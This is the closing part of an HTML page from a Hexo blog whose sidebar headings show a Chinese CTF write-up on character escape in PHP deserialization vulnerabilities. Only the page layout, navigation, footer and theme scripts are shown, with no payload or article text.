    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          Table of Contents
        </li>
        <li class="sidebar-nav-overview">
          Overview
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-3"><a class="nav-link" href="#0x01-%E5%85%B3%E4%BA%8E%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E4%B8%AD%E7%9A%84%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8"><span class="nav-number">1.</span> <span class="nav-text">0x01 关于反序列化漏洞中的字符逃逸</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E5%AD%97%E7%AC%A6%E4%B8%B2%E8%86%A8%E8%83%80%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8"><span class="nav-number">1.1.</span> <span class="nav-text">1.字符串膨胀导致的字符逃逸</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E5%AD%97%E7%AC%A6%E4%B8%B2%E7%BC%A9%E7%9F%AD%E5%AF%BC%E8%87%B4%E7%9A%84%E5%AD%97%E7%AC%A6%E9%80%83%E9%80%B8"><span class="nav-number">1.2.</span> <span class="nav-text">2.字符串缩短导致的字符逃逸</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#0x02-%E8%A7%A3%E9%A2%98"><span class="nav-number">2.</span> <span class="nav-text">0x02 解题</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#1-%E6%BA%90%E7%A0%81%EF%BC%9A"><span class="nav-number">2.1.</span> <span class="nav-text">1.源码：</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#2-%E6%9F%A5%E7%9C%8Bphpinfo"><span class="nav-number">2.2.</span> <span class="nav-text">2.查看phpinfo</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#3-%E6%9E%84%E9%80%A0payload"><span class="nav-number">2.3.</span> <span class="nav-text">3.构造payload</span></a></li></ol></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">nappingCat</p>
  <div class="site-description" itemprop="description">2571374157@qq.com</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">24</span>
          <span class="site-state-item-name">posts</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">17</span>
        <span class="site-state-item-name">tags</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">nappingCat</span>
</div>
  <div class="powered-by">Powered by <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a>
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>


  <script defer src="/lib/three/three.min.js"></script>


  















  

  

</body>
</html>
